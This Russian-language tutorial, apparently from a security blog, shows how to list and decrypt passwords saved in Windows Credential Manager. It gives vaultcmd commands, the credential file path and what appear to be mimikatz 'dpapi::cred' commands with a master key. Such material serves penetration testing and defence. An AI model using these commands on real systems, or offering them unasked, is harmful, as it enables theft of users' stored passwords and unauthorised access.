Диспетчер учетных данных Windows (Credential Manager), — это механизм, который позволяет управлять регистрационными данными пользователей (логин и пароль) для доступа к сетевым ресурсам, а также сертификатами и учетными данными для различных приложений (электронной почты, веб-сервисов и прочих).
В этой статье я покажу, как вытащить информацию из диспетчера учетных данных Windows.
Как извлечь данные из диспетчера учетных данных Windows
Рассмотрим работу с диспетчером учетных данных на примере RDP.
Найти те же данные с помощью командной строки можно следующим образом (для английской локалки следует использовать строку /listcreds:»Windows Credentials».):
1 |
> vaultcmd /listcreds:"Учетные данные Windows" /all |
Эти учетные данные хранятся в каталоге пользователя:
1 |
C:\Users\<USER>\AppData\Local\Microsoft\Credentials\ |
Посмотрим на эти данные.
1 |
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище] |
Самое интересное здесь — это pbData (данные, которые нужно расшифровать) и guidMasterKey. Как получить мастер-ключ, мы рассмотрели раньше (эту стадию мы пропустим). Давайте расшифруем учетные данные.
1 |
dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\[хранилище] /masterkeys:[мастер-ключ] |
Подобным образом можно извлечь любые данные, сохраненные в WCM.
На этом все. Теперь вы знаете, как расшифровать и просмотреть пароль в диспетчере учетных данных Windows.